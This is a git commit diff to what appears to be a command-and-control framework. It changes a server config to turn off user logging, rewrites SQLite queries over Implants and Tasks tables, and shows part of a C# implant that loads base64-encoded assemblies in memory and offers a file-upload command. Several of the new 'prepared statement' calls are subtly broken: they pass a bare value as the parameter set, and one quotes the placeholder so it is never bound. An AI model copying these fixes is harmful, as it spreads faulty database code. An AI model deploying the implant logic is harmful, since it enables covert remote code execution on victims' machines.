Remove duplicate Module loaded message in C# and use prepared statements in DB

2019-02-11 17:19:54 +00:00 · 2019-02-11 17:19:54 +00:00 · e16e73e629
parent 72172ba83c
commit e16e73e629
3 changed files with 7 additions and 8 deletions
--- a/Config.py
+++ b/Config.py
@ -17,7 +17,7 @@ QuickCommand = urlConfig.fetchQCUrl()
 DownloadURI = urlConfig.fetchConnUrl()
 Sounds = "No"
 ServerPort = "443"
-LogUsers = True 
+LogUsers = False 
 EnableNotifications = "No"
 # ClockworkSMS - https://www.clockworksms.com
--- a/DB.py
+++ b/DB.py
@ -387,7 +387,7 @@ def update_task(taskId, output):
  conn.text_factory = str
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=%s" % taskId, (output, completedTime))
+  c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=?", (output, completedTime, taskId))
  conn.commit()
  return c.lastrowid
@ -404,7 +404,7 @@ def get_implantbyid(id):
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("SELECT * FROM Implants WHERE ImplantID=%s" % id)
+  c.execute("SELECT * FROM Implants WHERE ImplantID=?" , id)
  result = c.fetchone()
  if result:
    return result
@ -426,7 +426,7 @@ def get_tasksbyid(id):
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=%s" % id)
+  c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=?", id)
  result = c.fetchone()
  if result:
    return result
@ -437,7 +437,7 @@ def get_newtasksbyid(taskid):
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("SELECT * FROM NewTasks WHERE TaskID=%s" % taskid)
+  c.execute("SELECT * FROM NewTasks WHERE TaskID=?", taskid)
  result = c.fetchone()
  if result:
    return result
@ -448,7 +448,7 @@ def get_seqcount(table):
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("SELECT seq FROM sqlite_sequence WHERE name=\"%s\"" % table)
+  c.execute("SELECT seq FROM sqlite_sequence WHERE name=\"?\"", table)
  result = int(c.fetchone()[0])
  if result:
    return result
@ -481,7 +481,7 @@ def get_cmd_from_task_id(taskId):
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
  c = conn.cursor()
-  c.execute("SELECT Command FROM Tasks WHERE TaskId=%s" % taskId)
+  c.execute("SELECT Command FROM Tasks WHERE TaskId=?", taskId)
  result = str(c.fetchone()[0])
  if result:
    return result
--- a/Files/Sharp.cs
+++ b/Files/Sharp.cs
@ -388,7 +388,6 @@ public class Program
 						{
 							var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
 							var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
 							output.AppendLine("Module loaded sucessfully");
 						}
 						else if (cmd.ToLower().StartsWith("upload-file"))
 						{